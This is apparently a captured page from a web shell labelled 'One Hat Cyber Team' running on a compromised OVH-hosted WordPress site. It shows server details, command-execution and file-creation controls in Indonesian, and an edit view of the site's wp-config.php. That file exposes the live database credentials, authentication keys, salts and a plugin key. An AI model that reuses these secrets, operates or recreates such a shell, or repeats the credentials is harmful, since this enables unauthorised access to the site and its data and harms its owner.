⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
92.222.139.190
Server:
Linux webd002.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
mspfmsm
/
blogplaypro
/
Edit File: wp-config.php
<?php //Begin Really Simple Security session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple Security cookie settings //Begin Really Simple Security key define('RSSSL_KEY', '51sJAmupHOJpODy0NBp9XrE73WnBo2ZyNfM46czDlfYpJrwHSDQl7mI0RqZDepUp'); //END Really Simple Security key define( 'WP_CACHE', true ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'mspfmsmadriana' ); /** Database username */ define( 'DB_USER', 'mspfmsmadriana' ); /** Database password */ define( 'DB_PASSWORD', 'Adriana94MxT' ); /** Database hostname */ define( 'DB_HOST', 'mspfmsmadriana.mysql.db' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); define('DISALLOW_FILE_EDIT', false); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '97SKOqDoKN3Nf@WGrWcCw7IRodVxg``vMQVfNj4kTC>7MG_hmB%`kh|E6hoeEubq' ); define( 'SECURE_AUTH_KEY', 'xwN9`D{7>+=-N;h~nVEE7c$GLt>e9gcZvMAD3uOo;O43_v|$+8W$r9|%n[<?MRE{' ); define( 'LOGGED_IN_KEY', '2J#@5b%QOjkZ3{vWKm,e4z.~lT77s.VFdpd@>l}.cWx.Q^!hv+z6Es22,Pf}{aRv' ); define( 'NONCE_KEY', 'AYec<]r<I#y2aAUwCC<j@eqm8x(AoJt.-^ua wl~[wCK$E-=jBiVVj*/t4z@k_%2' ); define( 'AUTH_SALT', 'TqlC2gbZ4o= $dD*ye$l^olV4;c~sMb_2laH)k3.Yq5{CnRndnaH0S[K$-_4B1vh' ); define( 'SECURE_AUTH_SALT', 'D44ZTiGxjlt6k`@5Fe6>^4/D5r[gMyYYU>x:@Im/v0GXHrzLm!a)C@TKZlV:Y0C{' ); define( 'LOGGED_IN_SALT', 'V(8eW2CAQ4|ID52zHNACC~K==cK{LnSS^LKDq,lMqf:(#iR&2N@{m@h(aJOY^,0(' ); define( 'NONCE_SALT', 'j:Ek.-b:l/hv!f=9l )O5;;z]l0v-ttkjx$^h8%*~Zi#;>/H zi^u-VNvX3HI)Z}' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'pro_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); #define( 'WP_DEBUG_LOG', true ); #define( 'WP_DEBUG_DISPLAY', true ); /* Add any custom values between this line and the "stop editing" line. */ define( 'DISALLOW_FILE_MODS', true ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Simpan